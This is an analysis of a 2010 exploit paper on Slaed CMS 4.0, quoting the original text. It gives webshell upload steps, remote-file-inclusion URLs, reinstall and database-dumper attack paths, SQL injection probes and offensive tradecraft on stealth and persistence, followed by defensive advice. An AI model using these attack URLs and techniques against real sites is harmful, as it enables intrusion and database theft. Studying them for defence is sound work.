Understanding Slaed CMS 4.0 Vulnerabilities: A Historical Exploit Analysis

Understanding Slaed CMS 4.0 Vulnerabilities: A Historical Exploit Analysis
What this paper is
This paper, published in 2010 by indoushka, details several vulnerabilities found in Slaed CMS version 4.0. It provides exploit techniques for gaining unauthorized access and control over a website running this specific content management system. The vulnerabilities discussed include file upload flaws, Remote File Inclusion (RFI), a script reinstallation exploit, a database dumper, and Blind SQL/XPath injection.
Simple technical breakdown
The paper describes several ways to compromise a Slaed CMS 4.0 installation:
- Upload Shell: This exploits a weakness in the file upload functionality, allowing an attacker to upload a malicious PHP script (a "webshell") that can then be executed remotely.
- RFI (Remote File Inclusion): This vulnerability allows an attacker to trick the website into including and executing code from a remote server. This is often achieved by manipulating parameters that are used to include files.
- Reinstall Script: This exploit targets the script's reinstallation process. By manipulating specific parameters, an attacker can trigger a reinstallation that might expose sensitive information or allow for unauthorized configuration.
- Database Dumper: This method leverages a JavaScript function to open a window that accesses a database dumping module. If the attacker can guess or obtain administrative credentials (potentially from the reinstallation exploit), they can then dump the website's database.
- Blind SQL/XPath Injection: This describes an attack where an attacker manipulates input parameters to infer information from the database or XML structure without directly seeing the results. This is a more advanced technique used to extract data or understand the underlying system.
Complete code and payload walkthrough
The provided "exploit" is not a single piece of executable code but rather a set of instructions and URL manipulations. There is no traditional "shellcode" or compiled payload in the Exploit-DB entry for this paper. Instead, the "payload" is the malicious URL or the uploaded file itself.
Let's break down each exploit method described:
1 - Upload Shell:
- Instruction: "first Register in to web site http://127.0.0.1/sd/index.php?name=files&op=add (use temper data)"
- Practical Purpose: This is the initial step to gain access to the file upload functionality. The
name=files&op=addpart likely navigates the CMS to a file upload form. "Temper data" suggests using a proxy tool like Burp Suite or OWASP ZAP to intercept and modify the HTTP request during registration or file upload to bypass restrictions.
- Practical Purpose: This is the initial step to gain access to the file upload functionality. The
- Instruction: "secend go to http://127.0.0.1/sd/uploads/files/temp/ 2 find you Ev!l"
- Practical Purpose: After successfully uploading a malicious file (e.g., a PHP webshell named
shell.php), this URL points to the directory where uploaded files are temporarily stored. The attacker would then navigate to this URL to find their uploaded webshell and execute it by clicking on it or directly accessing its URL. The "Ev!l" refers to the attacker's malicious file.
- Practical Purpose: After successfully uploading a malicious file (e.g., a PHP webshell named
2 - RFI:
- URL Example 1:
http://localhost/sd/index.php?file=http://localhost/c.txt?- Practical Purpose: This URL attempts to exploit a Remote File Inclusion vulnerability. The
index.phpscript is likely designed to include files based on thefileparameter. By providing a URL to a remote file (http://localhost/c.txt), the attacker tries to make the vulnerable server download and execute the content ofc.txtfrom the attacker's server. The extra?at the end might be an attempt to bypass certain sanitization filters.
- Practical Purpose: This URL attempts to exploit a Remote File Inclusion vulnerability. The
- URL Example 2:
http://localhost/sd/index.php?name=http://localhost/c.txt?- Practical Purpose: Similar to the first RFI example, but it targets a different parameter (
name). This suggests that theindex.phpscript might be vulnerable to RFI through multiple input parameters. Again, the attacker aims to include and execute remote code.
- Practical Purpose: Similar to the first RFI example, but it targets a different parameter (
3 - Reinstall Script:
- URL Example 1:
http://127.0.0.1/sd/setup.php?op=language&lang=1- Practical Purpose: This URL attempts to trigger a reinstallation or configuration process. The
setup.phpscript is typically used for initial installation. By manipulatingop=languageandlang=1, the attacker might be able to force the script into a state where it resets configurations, potentially revealing default credentials or creating new administrative accounts.
- Practical Purpose: This URL attempts to trigger a reinstallation or configuration process. The
- URL Example 2:
http://127.0.0.1/sd/install/index.php?op=language&lang=1- Practical Purpose: This is an alternative path to trigger a similar reinstallation or configuration exploit, targeting a different installation script (
install/index.php).
- Practical Purpose: This is an alternative path to trigger a similar reinstallation or configuration exploit, targeting a different installation script (
4 - Data Base Dumper:
- Instruction: "First go to http://127.0.0.1/sd/admin.php?op=files&panel=1"
- Practical Purpose: This navigates to the administrative panel, specifically to a section related to files. This might be a prerequisite to access other administrative functions or to inject JavaScript.
- Instruction: "put This code javascript:OpenWindow('modules/Dumper/index.php',%20'Dumper',%20'400',%20'350')"
- Practical Purpose: This is a JavaScript snippet. When executed within the administrative context (likely by injecting it into a field that allows JavaScript, or if the
admin.phppage itself is vulnerable to XSS), it calls a functionOpenWindow. This function is designed to open a new browser window. The parameters specify:'modules/Dumper/index.php': The URL of the database dumping script within the CMS.'Dumper': The title for the new window.'400', '350': The width and height of the new window.
- The attacker's goal is to open this dumper module.
- Practical Purpose: This is a JavaScript snippet. When executed within the administrative context (likely by injecting it into a field that allows JavaScript, or if the
- Instruction: "you know the user and pass from Reinstall script information to login to databass"
- Practical Purpose: This highlights the dependency between exploits. The attacker would use the credentials potentially exposed or reset by the "Reinstall Script" exploit to log into the administrative panel and then use the JavaScript to launch the database dumper.
5 - Blind SQL/XPath injection:
- URL Example:
http://127.0.0.1/sd/index.php?id=1- Practical Purpose: This URL demonstrates a common entry point for SQL or XPath injection. The
id=1parameter is passed toindex.php. An attacker would then modify thisidparameter with various SQL or XPath syntax (e.g.,id=1' OR '1'='1,id=1 AND 1=1,id=1 AND 1=2) to observe the website's response. By analyzing the differences in output, error messages, or page content, the attacker can infer information about the database structure or data, even if no direct data is displayed. This is a "blind" technique because the attacker doesn't see the raw SQL query results directly.
- Practical Purpose: This URL demonstrates a common entry point for SQL or XPath injection. The
Mapping list:
index.php?name=files&op=add-> Navigate to file upload form.http://127.0.0.1/sd/uploads/files/temp/-> Access uploaded files, including webshells.index.php?file=REMOTE_URL-> Remote File Inclusion (RFI) viafileparameter.index.php?name=REMOTE_URL-> Remote File Inclusion (RFI) vianameparameter.setup.php?op=language&lang=1-> Trigger script reinstallation/configuration exploit.install/index.php?op=language&lang=1-> Alternative path for reinstallation/configuration exploit.admin.php?op=files&panel=1-> Access administrative file section.javascript:OpenWindow('modules/Dumper/index.php', ...)-> Launch database dumper module via JavaScript injection.index.php?id=VALUE-> Potential entry point for Blind SQL/XPath injection.
Practical details for offensive operations teams
- Required Access Level:
- Initial Reconnaissance: Anonymous access to the target web application.
- Exploitation: Anonymous access is sufficient for RFI and potentially Blind SQL/XPath injection if input validation is weak. For Upload Shell and Database Dumper, registration or prior administrative access (or a vulnerability to gain it) is required.
- Lab Preconditions:
- A local or controlled environment running Slaed CMS 4.0.
- A web server (e.g., Apache, Nginx) configured to serve PHP.
- A database server (e.g., MySQL) for the CMS.
- A separate server controlled by the attacker to host RFI payloads.
- Tools for intercepting and modifying HTTP requests (e.g., Burp Suite, OWASP ZAP) for "temper data" steps.
- A tool to generate and host malicious files (e.g., a simple Python HTTP server for RFI payloads, a PHP webshell).
- Tooling Assumptions:
- Standard web browser.
- HTTP proxy for request manipulation.
- A simple HTTP server for RFI.
- A text editor for creating webshells and RFI payloads.
- Potentially a SQL/XPath injection tool if manual testing is too slow.
- Execution Pitfalls:
- File Upload: CMS might have file type restrictions (e.g.,
.phpdisallowed), size limits, or scan uploaded files for malicious content. The "temper data" step is crucial here to bypass such checks. - RFI: The CMS might have filters that sanitize or disallow URLs in parameters, or the
allow_url_fopenPHP directive might be disabled on the server, preventing RFI. The?at the end of the URL might be an attempt to bypass simple string matching filters. - Reinstall Script: The reinstallation process might require specific conditions or might have been patched in minor updates. The exact behavior depends on the CMS's internal logic.
- Database Dumper: Requires successful administrative login. If credentials cannot be obtained or guessed, this exploit path is blocked. The JavaScript injection might also be prevented by XSS filters.
- Blind SQL/XPath Injection: Can be time-consuming and requires careful analysis of responses. The effectiveness depends heavily on the specific SQL queries or XPath expressions used by the application.
- Version Specificity: This exploit is for Slaed CMS 4.0. Later versions are likely patched.
- File Upload: CMS might have file type restrictions (e.g.,
- Tradecraft Considerations:
- Stealth: RFI and Blind SQL/XPath injection can be relatively stealthy if carefully executed, as they don't necessarily involve uploading files or direct system commands.
- Persistence: Uploading a webshell provides a persistent backdoor.
- Credential Harvesting: The reinstallation exploit is a key step for obtaining credentials to access more sensitive areas like the database.
- Chain Exploitation: The paper clearly shows how multiple vulnerabilities can be chained together (e.g., reinstallation to get creds, then dumper).
- Obfuscation: For RFI, payloads in
c.txtmight need obfuscation to bypass basic content filters.
Where this was used and when
- Context: This exploit targets the Slaed CMS, a web content management system. The paper indicates it was tested on Windows SP2 and Linux Ubuntu. The "Dork" line suggests it targets websites using specific versions of Slaed CMS (© 2005-2008) and potentially licensed to specific domains.
- Approximate Years/Dates: The paper was published on February 27, 2010. The vulnerabilities were likely discovered shortly before this date. The CMS version mentioned (© 2005-2008) indicates the software was in use during that period and likely for some time after.
Defensive lessons for modern teams
- Input Validation: Rigorously validate and sanitize all user-supplied input, especially parameters used in file operations, includes, or database queries. Never trust client-side input.
- File Upload Security:
- Strictly control allowed file types and extensions.
- Store uploaded files outside the webroot or in a non-executable directory.
- Rename uploaded files to prevent direct execution.
- Scan uploaded files for malicious content.
- Disable Dangerous PHP Functions: If
allow_url_fopenandallow_url_includeare not strictly necessary for legitimate application functionality, disable them inphp.inito mitigate RFI risks. - Secure Installation/Configuration: Ensure installation and setup scripts are removed or secured after deployment. Implement robust authentication and authorization mechanisms for administrative functions. Avoid default credentials.
- Web Application Firewalls (WAFs): Use WAFs to detect and block common attack patterns like SQL injection, XSS, and RFI attempts. However, WAFs are not foolproof and should be part of a layered defense.
- Regular Patching and Updates: Keep all CMS software, plugins, and underlying server software up-to-date to patch known vulnerabilities.
- Least Privilege: Ensure web applications run with the minimum necessary privileges.
- Logging and Monitoring: Implement comprehensive logging for web server and application events. Monitor logs for suspicious activity, such as repeated failed login attempts, unusual file access, or unexpected URL patterns.
- Secure Coding Practices: Train developers on secure coding principles to prevent common vulnerabilities like those described.
ASCII visual (if applicable)
This exploit chain can be visualized as a flow of actions:
graph TD
A[Attacker] --> B(Target: Slaed CMS 4.0);
B --> C{Vulnerability Found?};
C -- Yes --> D{Exploit Path};
D -- 1. Upload Shell --> E[Upload Malicious PHP File];
E --> F[Execute Webshell];
D -- 2. RFI --> G[Inject Remote URL into Parameter];
G --> H[Server Includes & Executes Remote Code];
D -- 3. Reinstall Script --> I[Trigger Reinstall/Config Reset];
I --> J[Expose Credentials/Weak Config];
D -- 4. DB Dumper --> K[Inject JS to Open Dumper];
J --> L{Login to Admin};
L --> K;
K --> M[Dump Database];
D -- 5. Blind SQL/XPath --> N[Manipulate Input Parameters];
N --> O[Infer Data from Responses];
F --> P[Gain Control];
M --> P;
O --> P;Explanation of the Diagram:
- The attacker initiates actions against the Slaed CMS.
- If vulnerabilities exist, various exploit paths can be taken.
- Upload Shell allows uploading a file that can then be executed.
- RFI tricks the server into running code from an external source.
- Reinstall Script can reset configurations or reveal credentials.
- DB Dumper uses JavaScript to open a database dumping tool, often requiring credentials obtained from the reinstallation exploit.
- Blind SQL/XPath Injection allows data inference by observing how the application responds to crafted inputs.
- Ultimately, these exploits lead to gaining control over the compromised system.
Source references
- Paper ID: 11596
- Paper Title: Slaed CMS 4.0 - Multiple Vulnerabilities
- Author: indoushka
- Published: 2010-02-27
- Keywords: PHP, webapps
- Paper URL: https://www.exploit-db.com/papers/11596
- Raw URL: https://www.exploit-db.com/raw/11596
Original Exploit-DB Content (Verbatim)
========================================================================================
| # Title : Script Slaed Cms 4 Mullti Vulnerability
| # Author : indoushka
| # email : indoushka@hotmail.com
| # Home : www.sec-war.com
| # Web Site :
| # Dork : Powered by SLAED CMS © 2005-2008 SLAED. All rights reserved.
Licensed to w-arab.com © 2010 Creative Studio. All rights reserved.
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)
| # Bug : Mullti
====================== Exploit By indoushka =================================
# Exploit :
1 - Upload Shell:
first Register in to web site http://127.0.0.1/sd/index.php?name=files&op=add (use temper data)
secend go to http://127.0.0.1/sd/uploads/files/temp/ 2 find you Ev!l
2 - RFI:
http://localhost/sd/index.php?file=http://localhost/c.txt?
http://localhost/sd/index.php?name=http://localhost/c.txt?
3 - Reinstall Script :
http://127.0.0.1/sd/setup.php?op=language&lang=1
or
http://127.0.0.1/sd/install/index.php?op=language&lang=1
4 - Data Base Dumper :
First go to http://127.0.0.1/sd/admin.php?op=files&panel=1
put This code javascript:OpenWindow('modules/Dumper/index.php',%20'Dumper',%20'400',%20'350')
you know the user and pass from Reinstall script information to login to databass
5 - Blind SQL/XPath injection (I hate SQl *_*) :
http://127.0.0.1/sd/index.php?id=1
Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * Xproratix ==========================================
Greetz :
Exploit-db Team :
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
www.owned-m.com * Stake (www.v4-team.com) * www.securitywall.org * r1z (www.sec-r1z.com)
www.securityreason.com * www.packetstormsecurity.org * www.m-y.cc * Cyb3r IntRue (avengers team)
www.hacker.ps * www.no-exploit.com * www.bawassil.com * www.xp10.me * www.mormoroth.net
www.alkrsan.net * www.kadmiwe.net * www.arhack.net * D4NB4R http://www.ilegalintrusion.net/foro/
--------------------------------------------------------------------------------------------------------------